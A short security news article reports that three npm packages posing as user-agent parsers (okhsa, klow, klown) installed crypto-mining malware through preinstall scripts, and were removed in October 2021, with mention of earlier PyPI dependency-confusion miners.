Three JavaScript libraries were discovered on the official NPM package repository that were confirmed to be crypto-mining malware. This week’s revelation highlighted how vulnerable open-source software repository systems are to exploitation for executing attacks on Windows, macOS, and Linux systems.
The packages in question, which were published by one same developer, were designed to extract sensitive information from HTTP’s HTTP header. Claimed to be JavaScript-based user-agent string parsers, they, however, were infected with cryptocurrency mining malware.
The bad actor’s NPM account was deactivated, and the three libraries – okhsa, klow, and klown – were removed from the repository on October 15, 2021. The libraries were downloaded 112, 4, and 65 times respectively. “Klow” and “klown” have been tracked under Sonatype-2021-1472, and “okhsa” has been cataloged as Sonatype-2021-1473.
The attacks were carried out by running a .bat (for Windows) or .sh (for Unix-based OS) script:
“Packages ‘klow’ and ‘klown’ contain a cryptocurrency miner. These packages detect the current operating system at the preinstall stage, and proceed to run a .bat or .sh script depending on if the user is running Windows or a Unix-based operating system.”
“These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize,” Sonatype security researcher Ali ElShakankiry said.
This isn’t the first time that bad software has been found in the repository. Brandjacking, typosquatting, and cryptomining malware have been spotted before.
In June, security researchers from Sonatype and JFrog discovered packages on the PyPI repository that secretly deployed crypto-miners on affected machines. The packages were named after repositories or components from high-profile tech companies to perform what is known as dependency confusion attacks.
